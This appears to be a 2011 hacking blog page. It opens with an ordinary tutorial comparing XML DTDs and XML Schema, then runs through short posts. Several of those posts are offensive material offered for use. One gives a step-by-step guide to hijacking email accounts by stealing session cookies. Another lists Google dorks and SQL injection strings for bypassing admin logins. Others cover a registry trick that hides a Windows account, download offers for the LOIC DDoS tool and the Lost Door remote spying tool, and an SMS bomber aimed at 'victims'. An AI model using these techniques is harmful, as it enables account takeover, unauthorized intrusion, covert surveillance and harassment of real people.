Monday, August 29, 2011

XML DTDs Vs XML Schema

XML is a very handy format for storing and communicating your data between disparate systems in a platform-independent fashion. XML is more than just a format for computers — a guiding principle in its creation was that it should be Human Readable and easy to create. 

XML allows UNIX systems written in C to communicate with Web Services that, for example, run on the Microsoft .NET architecture and are written in ASP.NET. XML is however, only the meta-language that the systems understand — and they both need to agree on the format that the XML data will be in. Typically, one of the partners in the process will offer a service to the other: one is in charge of the format of the data.
The definition serves two purposes: the first is to ensure that the data that makes it past the parsing stage is at least in the right structure. As such, it’s a first level at which ‘garbage’ input can be rejected. Secondly, the definition documents the protocol in a standard, formal way, which makes it easier for developers to understand what’s available.
DTD – The Document Type Definition
The first method used to provide this definition was the DTD, or Document Type Definition. This defines the elements that may be included in your document, what attributes these elements have, and the ordering and nesting of the elements.

The DTD is declared in a DOCTYPE declaration beneath the XML declaration contained within an XML document:
Inline Definition:
  1. <?xml version="1.0"?> <br>  
  2. <!DOCTYPE documentelement [definition]>  
<?xml version="1.0"?> 

<!DOCTYPE documentelement [definition]>
External Definition:
  1. <?xml version="1.0"?> <br>  
  2. <!DOCTYPE documentelement SYSTEM "documentelement.dtd">  
<?xml version="1.0"?> 

<!DOCTYPE documentelement SYSTEM "documentelement.dtd">
The actual body of the DTD itself contains definitions in terms of elements and their attributes. For example, the following short DTD defines a bookstore. It states that a bookstore has a name, and stocks books on at least one topic.
Each topic has a name and 0 or more books in stock. Each book has a title, author and ISBN number. The name of the topic, and the name of the bookstore are defined as being the same type of element: this store’s PCDATA: just text data. The title and author of the book are stored as CDATA -- text data that won’t be parsed for further characters by the XML parser. The ISBN number is stored as an attribute of the book:
  1. <!DOCTYPE bookstore [ <br>  
  2.   <!ELEMENT bookstore (topic+)> <br>  
  3.   <!ELEMENT topic (name,book*)> <br>  
  4.   <!ELEMENT name (#PCDATA)> <br>  
  5.   <!ELEMENT book (title,author)> <br>  
  6.   <!ELEMENT title (#CDATA)> <br>  
  7.   <!ELEMENT author (#CDATA)> <br>  
  8.   <!ELEMENT isbn (#PCDATA)> <br>  
  9.   <!ATTLIST book isbn CDATA "0"> <br>  
  10.   ]>  
<!DOCTYPE bookstore [ 

  <!ELEMENT bookstore (topic+)> 

  <!ELEMENT topic (name,book*)> 

  <!ELEMENT name (#PCDATA)> 

  <!ELEMENT book (title,author)> 

  <!ELEMENT title (#CDATA)> 

  <!ELEMENT author (#CDATA)> 

  <!ELEMENT isbn (#PCDATA)> 

  <!ATTLIST book isbn CDATA "0"> 

  ]>
An example of a book store’s inline definition might be:
  1. <?xml version="1.0"?> <br>  
  2. <!DOCTYPE bookstore [ <br>  
  3.   <!ELEMENT bookstore (name,topic+)> <br>  
  4.   <!ELEMENT topic (name,book*)> <br>  
  5.   <!ELEMENT name (#PCDATA)> <br>  
  6.   <!ELEMENT book (title,author)> <br>  
  7.   <!ELEMENT title (#CDATA)> <br>  
  8.   <!ELEMENT author (#CDATA)> <br>  
  9.   <!ELEMENT isbn (#PCDATA)> <br>  
  10.   <!ATTLIST book isbn CDATA "0"> <br>  
  11.   ]> <br>  
  12. <bookstore> <br>  
  13.   <name>Mike's Store</name> <br>  
  14.   <topic> <br>  
  15.     <name>XML</name> <br>  
  16.     <book isbn="123-456-789"> <br>  
  17.       <title>Mike's Guide To DTD's and XML Schemas<</title> <br>  
  18.       <author>Mike Jervis</author> <br>  
  19.     </book> <br>  
  20.   </topic> <br>  
  21. </bookstore>  
<?xml version="1.0"?> 

<!DOCTYPE bookstore [ 

  <!ELEMENT bookstore (name,topic+)> 

  <!ELEMENT topic (name,book*)> 

  <!ELEMENT name (#PCDATA)> 

  <!ELEMENT book (title,author)> 

  <!ELEMENT title (#CDATA)> 

  <!ELEMENT author (#CDATA)> 

  <!ELEMENT isbn (#PCDATA)> 

  <!ATTLIST book isbn CDATA "0"> 

  ]> 

<bookstore> 

  <name>Mike's Store</name> 

  <topic> 

    <name>XML</name> 

    <book isbn="123-456-789"> 

      <title>Mike's Guide To DTD's and XML Schemas<</title> 

      <author>Mike Jervis</author> 

    </book> 

  </topic> 

</bookstore>
Using an inline definition is handy when you only have a few documents and they’re offline, as the definition is always in the file. However, if, for example, your DTD defines the XML protocol used to talk between two seperate systems, re-transmitting the DTD with each document adds an overhead to the communciations. Having an external DTD eliminates the need to re-send each time. We could remove the DTD from the document, and place it in a DTD file on a Web server that’s accessible by the two systems:
  1. <?xml version="1.0"?> <br>  
  2. <!DOCTYPE bookstore SYSTEM "http://webserver/bookstore.dtd"> <br>  
  3. <bookstore> <br>  
  4.   <name>Mike's Store</name> <br>  
  5.   <topic> <br>  
  6.     <name>XML</name> <br>  
  7.     <book isbn="123-456-789"> <br>  
  8.       <title>Mike's Guide To DTD's and XML Schemas<</title> <br>  
  9.       <author>Mike Jervis</author> <br>  
  10.     </book> <br>  
  11.   </topic> <br>  
  12. </bookstore>  
<?xml version="1.0"?> 

<!DOCTYPE bookstore SYSTEM "http://webserver/bookstore.dtd"> 

<bookstore> 

  <name>Mike's Store</name> 

  <topic> 

    <name>XML</name> 

    <book isbn="123-456-789"> 

      <title>Mike's Guide To DTD's and XML Schemas<</title> 

      <author>Mike Jervis</author> 

    </book> 

  </topic> 

</bookstore>
The file bookstore.dtd would contain the full defintion in a plain text file:
  1.  <!ELEMENT bookstore (name,topic+)> <br>  
  2.  <!ELEMENT topic (name,book*)> <br>  
  3.  <!ELEMENT name (#PCDATA)> <br>  
  4.  <!ELEMENT book (title,author)> <br>  
  5.  <!ELEMENT title (#CDATA)> <br>  
  6.  <!ELEMENT author (#CDATA)> <br>  
  7.  <!ELEMENT isbn (#PCDATA)> <br>  
  8.  <!ATTLIST book isbn CDATA "0">  
  <!ELEMENT bookstore (name,topic+)> 

  <!ELEMENT topic (name,book*)> 

  <!ELEMENT name (#PCDATA)> 

  <!ELEMENT book (title,author)> 

  <!ELEMENT title (#CDATA)> 

  <!ELEMENT author (#CDATA)> 

  <!ELEMENT isbn (#PCDATA)> 

  <!ATTLIST book isbn CDATA "0">
The lowest level of definition in a DTD is that something is either CDATA or PCDATA: Character Data, or Parsed Character Data. We can only define an element as text, and with this limitation, it is not possible, for example, to force an element to be numeric. Attributes can be forced to a range of defined values, but they can’t be forced to be numeric.

So for example, if you stored your applications settings in an XML file, it could be manually edited so that the windows start coordinates were strings — and you’d still need to validate this in your code, rather than have the parser do it for you.
XML Schemas
XML Schemas provide a much more powerful means by which to define your XML document structure and limitations. XML Schemas are themselves XML documents. They reference the XML Schema Namespace (detailed here), and even have their own DTD.
What XML Schemas do is provide an Object Oriented approach to defining the format of an XML document. XML Schemas provide a set of basic types. These types are much wider ranging than the basic PCDATA and CDATA of DTDs. They include most basic programming types such as integer, byte, string and floating point numbers, but they also expand into Internet data types such as ISO country and language codes (en-GB for example). A full list can be found here.
The author of an XML Schema then uses these core types, along with various operators and modifiers, to create complex types of their own. These complex types are then used to define an element in the XML Document.
As a simple example, let’s try to create a basic XML Schema for defining the bookstore that we used as an example for DTDs. Firstly, we must declare this as an XSD Document, and, as we want this to be very user friendly, we’re going to add some basic documentation to it:
  1. <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema">  <br>  
  2. <xsd:annotation>  <br>  
  3.   <xsd:documentation xlm:lang="en">  <br>  
  4.     XML Schema for a Bookstore as an example.  <br>  
  5.   </xsd:documentation>  <br>  
  6. </xsd:annotation>  
<xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema">  

<xsd:annotation>  

  <xsd:documentation xlm:lang="en">  

    XML Schema for a Bookstore as an example.  

  </xsd:documentation>  

</xsd:annotation>
Now, in the previous example, the bookstore consisted of the sequence of a name and at least one topic. We can easily do that in an XML Schema:
  1. <xsd:element name="bookstore" type="bookstoreType"/>  <br>  
  2. <xsd:complexType name="bookstoreType">  <br>  
  3.   <xsd:sequence>  <br>  
  4.     <xsd:element name="name" type="xsd:string"/>  <br>  
  5.     <xsd:element name="topic" type="topicType" minOccurs="1"/>  <br>  
  6.   </xsd:sequence>  <br>  
  7. </xsd:complexType>  
<xsd:element name="bookstore" type="bookstoreType"/>  

<xsd:complexType name="bookstoreType">  

  <xsd:sequence>  

    <xsd:element name="name" type="xsd:string"/>  

    <xsd:element name="topic" type="topicType" minOccurs="1"/>  

  </xsd:sequence>  

</xsd:complexType>
In this example, we’ve defined an element, bookstore, that will equate to an XML element in our document. We’ve defined it of type bookstoreType, which is not a standard type, and so we provide a definition of that type next.

We then define a complexType, which defines bookstoreType as a sequence of name and topic elements. Our "name" type is an xsd:string, a type defined by the XML Schema Namespace, and so we’ve fully defined that element.

The topic element, however, is of type topicType, another custom type that we must define. We’ve also defined our topic element with minOccurs="1", which means there must be at least one element at all times. As maxOccurs is not defined, there no upper limit to the number of elements that might be included. If we had specified neither, the default would be exactly one instance, as is used in the name element. Next, we define the schema for the topicType.
  1. <xsd:complexType name="topicType">  <br>  
  2.   <xsd:element name="name" type="xsd:string"/>  <br>  
  3.   <xsd:element name="book" type="bookType" minOccurs="0"/>  <br>  
  4. </xsd:complexType>  
<xsd:complexType name="topicType">  

  <xsd:element name="name" type="xsd:string"/>  

  <xsd:element name="book" type="bookType" minOccurs="0"/>  

</xsd:complexType>
This is all similar to the declaration of the bookstoreType, but note that we have to re-define our name element within the scope of this type. If we’d used a complex type for name, such as nameType, which defined only an xsd:string — and defined it outside our types, we could re-use it in both. However, to illustrate the point, I decided to define it within each section. XML gets interesting when we get to defining our bookType:
  1. <xsd:complexType name="bookType">  <br>  
  2.   <xsd:element name="title" type="xsd:string"/>  <br>  
  3.   <xsd:element name="author" type="xsd:string"/>  <br>  
  4.   <xsd:attribute name="isbn" type="isbnType"/>  <br>  
  5. </xsd:complexType>  <br>  
  6. <xsd:simpleType name="isbnType">  <br>  
  7.   <xsd:restriction base="xsd:string">  <br>  
  8.     <xsd:pattern value="\[0-9]{3}[-][0-9]{3}[-][0-9]{3}"/>  <br>  
  9.   </xsd:restriction>  <br>  
  10. </xsd:simpleType>  
<xsd:complexType name="bookType">  

  <xsd:element name="title" type="xsd:string"/>  

  <xsd:element name="author" type="xsd:string"/>  

  <xsd:attribute name="isbn" type="isbnType"/>  

</xsd:complexType>  

<xsd:simpleType name="isbnType">  

  <xsd:restriction base="xsd:string">  

    <xsd:pattern value="\[0-9]{3}[-][0-9]{3}[-][0-9]{3}"/>  

  </xsd:restriction>  

</xsd:simpleType>
So the definition of the bookType is not particularly interesting. But the definition of its attribute "isbn" is. Not only does XML Schema support the use of types such as xsd:nonNegativeNumber, but we can also create our own simple types from these basic types using various modifiers. In the example for isbnType above, we base it on a string, and restrict it to match a given regular expression. Excusing my poor regex, that should limit any isbn attribute to match the standard of three groups of three digits separated by a dash.
This is just a simple example, but it should give you a taste of the many things you can do to control the content of an attribute or an element. You have far more control over what is considered a valid XML document using a schema. You can even
  • extend your types from other types you’ve created,
  • require uniqueness within scope, and
  • provide lookups.
It’s a nicely object oriented approach. You could build a library of complexTypes and simpleTypes for re-use throughout many projects, and even find other definitions of common types (such as an "address", for example) from the Internet and use these to provide powerful definitions of your XML documents.
DTD vs XML Schema
The DTD provides a basic grammar for defining an XML Document in terms of the metadata that comprise the shape of the document. An XML Schema provides this, plus a detailed way to define what the data can and cannot contain. It provides far more control for the developer over what is legal, and it provides an Object Oriented approach, with all the benefits this entails.

So, if XML Schemas provide an Object Oriented approach to defining an XML document’s structure, and if XML Schemas give us the power to define re-useable types such as an ISBN number based on a wide range of pre-defined types, why would we use a DTD? There are in fact several good reasons for using the DTD instead of the schema.
Firstly, and rather an important point, is that XML Schema is a new technology. This means that whilst some XML Parsers support it fully, many still don’t. If you use XML to communicate with a legacy system, perhaps it won’t support the XML Schema.
Many systems interfaces are already defined as a DTD. They are mature definitions, rich and complex. The effort in re-writing the definition may not be worthwhile.
DTD is also established, and examples of common objects defined in a DTD abound on the Internet — freely available for re-use. A developer may be able to use these to define a DTD more quickly than they would be able to accomplish a complete re-development of the core elements as a new schema.
Finally, you must also consider the fact that the XML Schema is an XML document. It has an XML Namespace to refer to, and an XML DTD to define it. This is all overhead. When a parser examines the document, it may have to link this all in, interperate the DTD for the Schema, load the namespace, and validate the schema, etc., all before it can parse the actual XML document in question. If you’re using XML as a protocol between two systems that are in heavy use, and need a quick response, then this overhead may seriously degrade performance.

Then again, if your system is available for third party developers as a Web service, then the detailed enforcement of the XML Schema may protect your application a lot more effectively from malicious — or just plain bad — XML packets. As an example, Muse.net is an interesting technology. They have a publicly-available SOAP API defined with an XML Schema that provides their developers more control over what they receive from the user community.

Saturday, August 13, 2011

Carding Techniques -Hacks

This summary is not available. Please click here to view the post.

GnackTrackR6 Released , available for Download !

GnackTrackR6 Released , available for Download !
GnackTrack is a Live (and installable) Linux distribution designed for Penetration Testing and is based on Ubuntu. Although this sounds like BackTrack, it is most certainly not; it's very similar but based on the much loved GNOME!

GnackTrackR6 has just been released. This version has many wireless patches precompiled in and also has the latest version of kismet, wireshark, xplico, metasploit, nmap, beef, w3af, aircrack, armitage and much more.
GnackTrackR6 can be run live from DVD or USB and can also be installed natively. There is also a VMWare image available for those that test from within a virtual machine.

The Developers are constantly taking new requests for tools and adding them pretty quickly.

To get your copy just go to : Click Here

Low Orbit Ion Cannon - An open source network stress tool (Ddos) !

 
Its an ddos tool which helps to attack an server by sending 
the more numbers of packets you can download from here 

Download Here

6 Tips to Avoid Facebook Viruses and Spam Messages

Facebook, the biggest social network with 500 million users, provides an interface to hit an unsuspecting crowd with malware and viruses. These viruses aren’t very difficult to detect  if you are cautious enough. These Facebook viruses appear on your wall in forms of a bizarre or eye-catching stories and videos and once the user has clicked/liked the link, it is already late. The next step will be getting rid of your Facebook virus which is a time-consuming  process.  Its better to avoid spam messages and trojan viruses in the first place.

How to avoid it?

1. Think before you Act. Viruses on Facebook are sneaky. The hackers and cybercriminals who want your information know that Facebook users will often click on an interesting post without a moment’s thought. If a post sounds a bit over-the-top like a headline out of a tabloid, this is your first warning sign.
2. Try to avoid Links and videos with Catchy words like  “funniest ever,” “most hilarious video on Facebook,” or “you’ve got to see this.” Do some keyword research to see if the post in question comes up in a search engine with information about a current virus or trojan.
3. Check the poster of the Suspicious content. If you receive a message from someone you do not know, this is an obvious red flag. Facebook video viruses also tend to pop up in your news feed or on your wall from friends you haven’t talked to in a while. Unfortunately, it’s likely this friend has already fallen victim to the latest virus on Facebook. After clicking on the story themselves, the message was sent out to all of their friends as well.
4 Avoid messages that have been posted by multiple users as the virus spreads among your friends who were not so cautious. If a link with title such as “Sexiest video ever” shows up all over your feed from all kinds of people (perhaps friends you would not expect to make such a post), this is another warning sign. Similar direct messages are a likely variant of the notorious Facebook Koobface virus which has used this approach in the past.
5. Do not fall for the “typical” money-transfer schemes. Chat messages from friends needing funds will usually sound suspicious. Everything can’t be screened before posting, so money transfer scams and hoax applications still find their way on to Facebook. You should also avoid applications that claim to do a full “Error check” or fix security problems related to your profile.
6. Update your anti-virus software frequently. If you do accidentally click on a post before realizing it is a hoax, do not click on any further links or downloads. If it’s too late and you have already been infected, the Facebook virus removal process may be effortless if you have a good anti-virus program to catch the virus, trojan or other malware early on.

What’s Next?

These were few important tips to safeguard your facebook account but your job isn’t done yet. Once you have detected that the link/post on your facebook wall is Malicious you should Mark it as SPAM so that the facebook support will stop it from spreading further and infecting other users.
If you have ever fallen victim of any such Malicious Scheme, please share your experience with all the users  in form of comments so that others don’t fall victim of it.

Create Hidden Account In XP


Since we are going to do all the Editing in Window   Registry it is Recommended to Back Up the Registry before going Further.



After you have Backed up your registry follow the Steps to Create your Hidden Account:
First Goto Start -> Run -> Type regedit -> Enter
In the Left Menu goto,

HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\Cu rrentVersion\Winlogon\SpecialAccounts\UserList

In the Right pane, Right click -> New -> String Value
Right click on the new String Value and click Rename
Type the Name of the Account you want to hide.
Hit Enter then Right click on the String Value again and Change value to 0 which hides it. If you want it to be Visible to all Enter the Value 1.
Now Save and Exit the Registry and Logoff.
Goto welcome screen and Hit ctrl+alt+del twice to bring up Logon prompt
Type hidden Accounts name and password

How to hack an Email account using Cookie Stealing.



If you are a newbie and don't know about cookie, then for your information, Cookie is a piece of text stored on user computer by websites visited by the user. This stored cookie is used by webserver to identify and authenticate the user. So, if you steal this cookie (which is stored in victim browser) and inject this stealed cookie in your browser, you can imitate victim identity to webserver and enter his Email account easily. This is called Session Hijacking. Thus, you can easily hack Email account using such Cookie stealing hacks.

Tools needed for Cookie stealing attack:


Cookie stealing attack requires two types of tools:
1. Cookie capturing tool
2. Cookie injecting/editing tool

1. Cookie capturing tool:Suppose, you are running your computer on a LAN. The victim too runs on same LAN. Then, you can use Cookie capturing tool to sniff all the packets to and from victim computer. Some of the packets contain cookie information. These packets can be decoded using Cookie capturing tool and you can easily obtain cookie information necessary to hack Email account. Wireshark and HTTP Debugger Pro softwares can be used to capture cookies.

Update: Check out my Wireshark tutorial for more information on cookie capturing tool.

2. Cookie injecting/editing tool:

Now, once you have successfully captured your victim cookies, you have inject those cookies in your browser. This job is done using Cookie injecting tool. Also, in certain cases after injection, you need to edit cookies which can be done by Cookie editing tool. This cookie injection/editing can be done using simple Firefox addons Add N Edit Cookies and Greasemonkey scripts. I will write more on these two tools in my future articles.

Update: Check out my article How to hack Gmail account by Cookie stealing for more information on Cookie injecting tool.

Drawbacks of Cookie Stealing:


Cookie Stealing is neglected because it has some serious drawbacks:

1. Cookie has an expiry time i.e. after certain trigger cookie expires and you cannot use it to hijack victim session. Cookie expiry is implemented in two ways:

a. By assigning specific timestamp(helpful for us).

b. By checking for triggers like user exiting from webbrowser. So, in such cases, whenever user exits from his browser, his cookie expires and our captured cookie becomes useless.

2. Cookie stealing becomes useless in SSL encrypted environment i.e. for https (Secure HTTP) links. But, most Email accounts and social networking sites rarely use https unless vicitm has manually set https as mandatory connection type.

3. Also, most cookies expire once victim hits on LogOut button. So, you have to implement this Cookie stealing hack while user is logged in. But, I think this is not such a serious drawback because most of us have the habit of checking "Remember Me". So, very few people actually log out of their accounts on their PCs.

Enjoy Cookie stealing trick to hack Email account...

Gaining Auth Bypass On an Admin Account.


 
Most sites vulnerable to this are .asp
First we need 2 find a site, start by opening google.
Now we type our dork: "defenition of dork" 'a search entry for a certain type of site/exploit .ect"
There is a large number of google dork for basic sql injection.
here is the best:
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
Now what to do once we get to our site.
the site should look something like this :
welcome to xxxxxxxxxx administrator panel
username :
password :
so what we do here is in the username we always type "Admin"
and for our password we type our sql injection
here is a list of sql injections
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --

Lost®Door J-Revolution v6



What is Lost Door?
Lost Door is a remote administration and spying tool for Microsoft Windows operating systems.

What operating systems are supported?

Windows 95/95B Windows 98/98SE 
Windows ME
Windows NT 4.0 Windows 2000 
Windows XP
windows Vista
windows Seven

What´s New

  * Sin GUI changed 
  * Webcam Stream fixed
  * Open website in the defaut browser added
  * Severals Minor bugs has been fixed
  * Kelogger updated it looks more clear
  * Upload option fixed ( Download from a website to a desired path)
  * Download & Run was added
  * Change icon removed 








Download:
http://www.multiupload.com/SLBQMUVS3D

SMS -BOMBER

Features Include:
Full Feature List:
Custom SMTP Server (Make Sure You Type It Right)
Custom Carrier Gateway (If Your Victims Gateway Is Not In The Large List You May Find And Enter it Yourself)
Custom Number Of SMS To Send (Finally Have Where You Can Enter Any Amount To Send)
Save/Load Settings (Will Save Everything You Enter In The Fields, Restarting Your Computer Will Lose The Saved Settings)
Fixed XP GUI Issues
Stop Bombing At Any Time
Watch The Number Of SMS Sent In The Title Bar
No Longer Freezes While Sending
Added A Recent slave's Box Where You Can Select An Entry And Right-Click It To Bomb It Again Or Delete It From The List
Save/Load Recent Victims List

GMail Is The Default SMTP Server That Is Used Which Has A Limit On The Number That Can Be Sent
Has A Lot Of Carriers Already Pre-Entered For You.
SMS Looks Like

FRM: Senders Email
SUBJ: Subject
MSG: Message

What Is New In The Pro Version:
New GUI
Error Handling, For Example If There Was An Error Sending The Message It Will Ask You If You Want To Change The E-mail/Password You Are Using. This Is Just One Of The Many Error Handling I Have Added.
[Image: 1XB4F.png]

DOWNLOAD :



Finding A Spoofed Website With A Javascript



Lots of people think that Javascript is an inferior language but Javascript is an extremly powerful language and those people who think the other way they either don't know how to use it or are not familiar with it's capabilities, With javascript you can do lots of cool things such as edit any page, make an image fly etc, but it is a waste of time to spend your time on making images fly with javascripts or editing a page.
Anyways coming to the main topic, did you know that javascript can be used to detect if a page is a spoofed website or phishing website or a legit one, well if you don't know just paste the following code in to the address bar and a pop up will appear telling you whether the website is original or not
Here is the Javascript code:

javascript:alert("The actual URL is:\t\t" + location.protocol + "//" + location.hostname + "/" + "\nThe address URL is:\t\t" + location.href + "\n" + "\nIf the server names do not match, this may be a spoof.");

How to use your Gmail space as hard disk

If you’re having extra space on your Gmail account and you don’t have extra space on your hard disk, you can use that free Gmail space as a hard drive. Using a cool freeware program called Gdrive will create an extra drive inside My Computer,
and every time you use this drive i.e. use files from it, is actually downloading and uploading to your Gmail account.

1. First download Gmail Drive



2. Extract the files from the downloaded file and click Setup.

3. After the installation go to My Computer and an extra drive called Gmail Drive will appear

4. Double click it and a window with the user name and password will appear

How To Convert Text Into Audio Using Notepad



This is simple notepad trick that convert any text to audio with just a click.
1) Open Notepad , and copy/paste following code
Dim msg, sapi
msg=InputBox("Enter your text for conversion–www.priyahackingarticles.blogspot.com"," Hacks Text-To-Audio Converter")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg
2) Save as your_file_name.vbs
3)Now open the saved file and key in the text you want to convert and click OK.

Sqlmap 0.9 Available For Download Now

Sqlmap is a very popular tool used which automates the method of discovering a 
Sql injection flaw in a web application and exploitation part as well. Sqlmap team has just released the newest version of Sqlmap, Sql map comes in with lots of changes including a fully re-written SQL Injection flaw detecting engine.

Features

Here are some of the newset features in Sqlmap 0.9:
 * Rewritten SQL injection detection engine (Bernardo and Miroslav).
    * Support to directly connect to the database without passing via a SQL injection, -d switch (Bernardo and Miroslav).
    * Added full support for both time-based blind SQL injection and error-based SQL injection techniques (Bernardo and Miroslav).
    * Implemented support for SQLite 2 and 3 (Bernardo and Miroslav).
    * Implemented support for Firebird (Bernardo and Miroslav).
    * Implemented support for Microsoft Access, Sybase and SAP MaxDB (Miroslav).
    * Added support to tamper injection data with –tamper switch (Bernardo and Miroslav).
    * Added automatic recognition of password hashes format and support to crack them with a dictionary-based attack (Miroslav).
    * Added support to fetch unicode data (Bernardo and Miroslav).
    * Added support to use persistent HTTP(s) connection for speed improvement, –keep-alive switch (Miroslav).
    * Implemented several optimization switches to speed up the exploitation of SQL injections (Bernardo and Miroslav).
    * Support to parse and test forms on target url, –forms switch (Bernardo and Miroslav).
    * Added switches to brute-force tables names and columns names with a dictionary attack, –common-tables and –common-columns.

You can download Sqlmap 0.9 here